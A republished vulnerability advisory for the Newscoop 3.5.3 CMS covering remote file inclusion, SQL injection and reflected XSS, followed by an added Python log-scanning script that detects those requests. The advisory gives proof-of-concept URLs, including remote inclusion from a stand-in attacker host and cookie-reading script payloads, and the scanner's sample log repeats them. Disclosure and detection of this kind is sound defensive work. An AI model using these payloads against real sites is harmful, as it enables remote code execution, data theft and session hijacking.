Newscoop 3.5.3 multiple vulnerabilities and fix

Source: Internet
Author: User

Product: Newscoop

Vendor: Sourcefabric o.p.s.

Affected Versions: 3.5.3 and probably prior, partially 4.0 RC3

Tested Version: 3.5.3

Vulnerability Type: Remote File Inclusion, SQL Injection, Cross-Site Scripting (XSS)

CVE Reference(s): CVE-2012-1933, CVE-2012-1934, CVE-2012-1935

Solution: Fixed by the vendor; upgrade to Newscoop 3.5.5

Risk Level: High
 
Credit: High-Tech Bridge SA Security Research Lab (https://www.htbridge.com/advisory)
 

Analysis

 
High-Tech Bridge SA Security Research Lab has discovered multiple vulnerabilities in Newscoop, which can be exploited to perform Remote File Injection, SQL Injection and Cross-Site Scripting (XSS) attacks.
 

 

 
1) Multiple Remote File Inclusion in Newscoop: CVE-2012-1933

1.1 Input passed via the "GLOBALS[g_campsiteDir]" GET parameter to /include/phorum_load.php is not properly verified before being used in a require_once() call and can be exploited to include arbitrary remote files.

The following PoC (Proof of Concept) demonstrates the vulnerability:

http://[host]/include/phorum_load.php?GLOBALS[g_campsiteDir]=http://attacker.site/file%00
 

 
1.2 Input passed via the "GLOBALS[g_campsiteDir]" GET parameter to /conf/install_conf.php is not properly verified before being used in a require_once() call and can be exploited to include arbitrary remote files.

The following PoC demonstrates the vulnerability:

http://[host]/conf/install_conf.php?GLOBALS[g_campsiteDir]=http://attacker.site/file%00
 

 
1.3 Input passed via the "GLOBALS[g_campsiteDir]" GET parameter to /conf/liveuser_configuration.php is not properly verified before being used in a require_once() call and can be exploited to include arbitrary remote files.

The following PoC demonstrates the vulnerability:

http://[host]/conf/liveuser_configuration.php?GLOBALS[g_campsiteDir]=http://attacker.site/file%00
 

 
Successful exploitation of these vulnerabilities (1.1-1.3) requires that "register_globals" is enabled.
 

 

 
2) SQL Injection in Newscoop: CVE-2012-1934

2.1 Input passed via the "f_country_code" GET parameter to /admin/country/edit.php is not properly sanitised before being used in an SQL query.

This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

The following PoC (Proof of Concept) demonstrates the vulnerability:

http://[host]/admin/country/edit.php?f_country_code=%27%20union%20select%201,2,version%28%29%20--%202
 

 
Successful exploitation of the vulnerability requires the attacker to be registered, logged in and to have permission to manage countries. For successful exploitation "Limit" should be disabled as well.
 

 

 
3) Multiple Cross-Site Scripting (XSS) in Newscoop: CVE-2012-1935

3.1 Input passed via the "Back" GET parameter to /admin/ad.php is not properly sanitised before being returned to the user.

This can be exploited to execute arbitrary HTML and script code in the administrator's browser session in the context of the affected website.

The following PoC (Proof of Concept) demonstrates the vulnerability:

http://[host]/admin/ad.php?Back=%27%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
 

 
3.2 Input passed via the "error_code" GET parameter to /admin/login.php is not properly sanitised before being returned to the user.

This can be exploited to execute arbitrary HTML and script code in the user's browser session in the context of the affected website.

The following PoC demonstrates the vulnerability:

http://[host]/admin/login.php?error_code=upgrade&f_user_name=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
 

 
3.3 Input passed via the "token" and "f_email" GET parameters to /admin/password_check_token.php is not properly sanitised before being returned to the user.

This can be exploited to execute arbitrary HTML and script code in the user's browser session in the context of the affected website.

The following PoCs demonstrate the vulnerabilities:

http://[host]/admin/password_check_token.php?token=1&f_email=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E

http://[host]/admin/password_check_token.php?f_email=1&token=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
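The three request shapes described in sections 1 to 3, as an added detection example that is not part of the advisory: a Python script that parses constructed Apache-style access-log lines (placeholder IPs and hosts) and labels requests that set a GLOBALS[...] parameter with a URL or null byte, inject SQL into f_country_code, or carry script tags in the reflected parameters the advisory names.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Apache-style log regex: the client IP and the request target are all we need here.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+)[^"]*"')

# Parameters the advisory names, grouped by the vulnerability class they feed.
SQLI_PARAMS = {"f_country_code"}
XSS_PARAMS = {"Back", "error_code", "f_user_name", "token", "f_email"}

# Constructed sample log (not from the advisory); IPs are documentation ranges,
# and the three attack requests reproduce the advisory's PoC shapes.
SAMPLE_LOG = """\
203.0.113.5 - - [01/Jun/2012:10:00:01 +0000] "GET /include/phorum_load.php?GLOBALS[g_campsiteDir]=http://attacker.site/file%00 HTTP/1.1" 200 512
203.0.113.5 - - [01/Jun/2012:10:00:02 +0000] "GET /admin/country/edit.php?f_country_code=%27%20union%20select%201,2,version%28%29%20--%202 HTTP/1.1" 200 1024
203.0.113.5 - - [01/Jun/2012:10:00:03 +0000] "GET /admin/ad.php?Back=%27%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E HTTP/1.1" 200 2048
198.51.100.7 - - [01/Jun/2012:10:00:04 +0000] "GET /admin/country/edit.php?f_country_code=US HTTP/1.1" 200 1024
"""

def classify(key, value):
    """Label one URL-decoded query parameter, or return None if it looks benign."""
    if key.startswith("GLOBALS["):
        # No legitimate request sets GLOBALS[...]; with register_globals on it
        # overwrites $GLOBALS, and a URL or null byte is the section 1 RFI shape.
        if re.match(r"https?://", value, re.I) or "\x00" in value:
            return "CVE-2012-1933 remote file inclusion"
        return "GLOBALS[] override attempt"
    if key in SQLI_PARAMS and re.search(r"\bunion\b.*\bselect\b|--", value, re.I):
        return "CVE-2012-1934 SQL injection"
    if key in XSS_PARAMS and re.search(r"<\s*/?\s*script|javascript:|on\w+\s*=", value, re.I):
        return "CVE-2012-1935 reflected XSS"
    return None

def scan_log(text):
    """Return one finding dict per suspicious parameter, in log order."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not well-formed requests
        parts = urlsplit(m.group("target"))
        # keep_blank_values so an empty GLOBALS[...]= still surfaces the key
        for key, value in parse_qsl(parts.query, keep_blank_values=True):
            label = classify(key, value)
            if label:
                findings.append({"ip": m.group("ip"), "path": parts.path,
                                 "param": key, "label": label})
    return findings
```

Running `scan_log(SAMPLE_LOG)` flags the first three constructed lines and leaves the benign `f_country_code=US` request alone.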
 

 
 

Solution

Upgrade to Newscoop 3.5.5

Make sure that "register_globals" is set to off (fix for CVE-2012-1933)

More Information:

http://www.sourcefabric.org/en/newscoop/latestrelease/1141/Newscoop-355-and-Newscoop-4-RC4-security-releases.htm

http://dev.sourcefabric.org/browse/CS-4179
 
